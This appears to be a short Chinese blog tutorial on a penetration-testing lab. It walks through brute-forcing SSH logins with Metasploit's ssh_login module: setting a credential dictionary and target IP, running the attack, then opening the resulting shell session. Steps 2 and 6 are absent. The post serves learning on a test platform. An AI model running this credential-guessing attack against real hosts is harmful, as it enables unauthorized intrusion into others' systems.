1.老规矩扫描端口信息.
3.其实渗透员都要需要在不同的状况使用不同的技巧来进行渗透, 因为我们是使用开放的测试平台所以我们不玩其他方式就直接爆破字典
4.使用ssh用户爆破攻击.
> use auxiliary/scanner/ssh/ssh_login
5.准备字典.
[Username] [Password]
> set USERPASS_FILE [字典路径]
> set RHOSTS [目标IP]
7.攻击, 当你看见 Command shell session 1 openned就代表成功连接上目标然后目标连接id 是sessions 1.
> exploit
8.显示已连接用户, sessions 1 就是 id 1所以对了.
> sessions -l
9. 连接该用户.
> sessions -i [id号码]
10.输入shell指令, 成功使用.
ifconfig(显示网络配置)
pwd(就是显示我们的目录位置)
11.退出.
感谢阅读
No comments:
Post a Comment